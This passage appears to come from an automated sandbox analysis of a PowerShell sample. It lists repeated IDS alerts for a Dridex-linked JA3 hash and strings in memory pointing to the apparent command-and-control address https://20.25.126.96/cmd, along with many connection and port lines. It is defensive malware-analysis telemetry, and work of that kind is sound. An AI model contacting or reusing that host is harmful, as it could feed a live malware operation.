                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50065 -> 20.25.126.96:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50086 -> 20.25.126.96:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50089 -> 20.25.126.96:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50099 -> 20.25.126.96:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50114 -> 20.25.126.96:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50108 -> 20.25.126.96:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50123 -> 20.25.126.96:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50111 -> 20.25.126.96:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50133 -> 20.25.126.96:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50096 -> 20.25.126.96:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50139 -> 20.25.126.96:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50142 -> 20.25.126.96:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50145 -> 20.25.126.96:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50105 -> 20.25.126.96:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50130 -> 20.25.126.96:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50102 -> 20.25.126.96:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50093 -> 20.25.126.96:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50117 -> 20.25.126.96:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50148 -> 20.25.126.96:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50126 -> 20.25.126.96:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50154 -> 20.25.126.96:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50151 -> 20.25.126.96:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50136 -> 20.25.126.96:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50163 -> 20.25.126.96:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50175 -> 20.25.126.96:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50169 -> 20.25.126.96:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50120 -> 20.25.126.96:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50160 -> 20.25.126.96:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50172 -> 20.25.126.96:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50178 -> 20.25.126.96:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50166 -> 20.25.126.96:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50184 -> 20.25.126.96:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50190 -> 20.25.126.96:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50157 -> 20.25.126.96:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50202 -> 20.25.126.96:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50193 -> 20.25.126.96:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50187 -> 20.25.126.96:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50199 -> 20.25.126.96:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50205 -> 20.25.126.96:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50211 -> 20.25.126.96:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50221 -> 20.25.126.96:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50224 -> 20.25.126.96:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50214 -> 20.25.126.96:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50218 -> 20.25.126.96:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50227 -> 20.25.126.96:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50242 -> 20.25.126.96:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50236 -> 20.25.126.96:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50196 -> 20.25.126.96:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50181 -> 20.25.126.96:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50233 -> 20.25.126.96:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50208 -> 20.25.126.96:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50230 -> 20.25.126.96:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50239 -> 20.25.126.96:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50248 -> 20.25.126.96:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50245 -> 20.25.126.96:443
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.25.126.96
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.25.126.96
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.25.126.96
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.25.126.96
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.25.126.96
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.25.126.96
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.25.126.96
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.25.126.96
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.25.126.96
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.25.126.96
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.25.126.96
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.25.126.96
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.25.126.96
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.25.126.96
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.25.126.96
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.25.126.96
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.25.126.96
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.25.126.96
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.25.126.96
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.25.126.96
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.25.126.96
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.25.126.96
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.25.126.96
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.25.126.96
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.25.126.96
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.25.126.96
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.25.126.96
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.25.126.96
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.25.126.96
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.25.126.96
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.25.126.96
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.25.126.96
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.25.126.96
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.25.126.96
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.25.126.96
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.25.126.96
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.25.126.96
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.25.126.96
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.25.126.96
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.25.126.96
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.25.126.96
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.25.126.96
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.25.126.96
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.25.126.96
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.25.126.96
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.25.126.96
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.25.126.96
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.25.126.96
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.25.126.96
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.25.126.96
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_000001A6ED34717C recv,shutdown,closesocket,0_2_000001A6ED34717C
                    Source: powershell.exe, 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:%u/
                    Source: powershell.exe, 00000000.00000002.4595950980.000001A6E4C51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.4580368839.000001A6D5739000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: powershell.exe, 00000000.00000002.4580368839.000001A6D4D39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: powershell.exe, 00000000.00000002.4580368839.000001A6D4B11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 00000000.00000002.4580368839.000001A6D4D39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: powershell.exe, 00000000.00000002.4602674229.000001A6ECFBB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.4602030423.000001A6ECEFD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.4601032571.000001A6ECC91000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.4602030423.000001A6ECEB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://20.25.126.96/
                    Source: powershell.exe, 00000000.00000002.4602030423.000001A6ECEFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://20.25.126.96/?
                    Source: powershell.exe, 00000000.00000002.4602030423.000001A6ECEFD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.4601032571.000001A6ECC91000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.4602030423.000001A6ECEB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://20.25.126.96/cm
                    Source: powershell.exe, 00000000.00000002.4602674229.000001A6ECFBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://20.25.126.96/cm5.126.96/cm
                    Source: powershell.exe, 00000000.00000002.4601032571.000001A6ECCFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://20.25.126.96/cm;
                    Source: powershell.exe, 00000000.00000002.4601032571.000001A6ECCFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://20.25.126.96/cm=
                    Source: powershell.exe, 00000000.00000002.4601032571.000001A6ECCFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://20.25.126.96/cmW
                    Source: powershell.exe, 00000000.00000002.4602030423.000001A6ECEB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://20.25.126.96/cmd
                    Source: powershell.exe, 00000000.00000002.4602030423.000001A6ECEB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://20.25.126.96/cmf
                    Source: powershell.exe, 00000000.00000002.4602674229.000001A6ECFBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://20.25.126.96/cmq
                    Source: powershell.exe, 00000000.00000002.4602674229.000001A6ECFBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://20.25.126.96/cms
                    Source: powershell.exe, 00000000.00000002.4602674229.000001A6ECFBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://20.25.126.96/cmv
                    Source: powershell.exe, 00000000.00000002.4602674229.000001A6ECFBB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.4602030423.000001A6ECEFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://20.25.126.96/cmw
                    Source: powershell.exe, 00000000.00000002.4602674229.000001A6ECFBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://20.25.126.96/j
                    Source: powershell.exe, 00000000.00000002.4602674229.000001A6ECFBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://20.25.126.96/m
                    Source: powershell.exe, 00000000.00000002.4602674229.000001A6ECFBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://20.25.126.96/ms
                    Source: powershell.exe, 00000000.00000002.4602674229.000001A6ECFBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://20.25.126.96/ms2
                    Source: powershell.exe, 00000000.00000002.4602674229.000001A6ECFBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://20.25.126.96/ngs
                    Source: powershell.exe, 00000000.00000002.4580368839.000001A6D4B11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                    Source: powershell.exe, 00000000.00000002.4580368839.000001A6D5739000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 00000000.00000002.4580368839.000001A6D5739000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 00000000.00000002.4580368839.000001A6D5739000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: powershell.exe, 00000000.00000002.4580368839.000001A6D4D39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: powershell.exe, 00000000.00000002.4580368839.000001A6D5739000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                    Source: powershell.exe, 00000000.00000002.4595950980.000001A6E4C51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50131 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50154 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50211 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50234 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50177 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50085 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50165 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50222 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50074 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50107 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49964
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50120 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50189 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50246 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50130 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50096 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50108 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50073 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50062 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50119 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50142 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50178 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50153 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50210 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50235 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50061 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50187 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50221 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50144 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50209 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50247 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50095 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50155 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50176 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50084 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50166 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50143 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50208 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50110 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50236 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50083 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50121 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50188 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50220 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50109 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50072 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50132 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50199 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50215
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50218
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50217
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50219
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50174 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50139 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50151 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50116 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50210
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50212
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50225 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50202 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50211
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50094 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50214
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50213
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50071 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50106
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50227
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50105
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50226
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50108
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50229
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50107
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50228
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50109
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50100
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50186 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50221
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50220
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50102
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50223
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50101
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50222
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50243 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50104
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50225
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50103
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50224
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50128 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50162 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50197 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50117
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50238
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50116
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50237
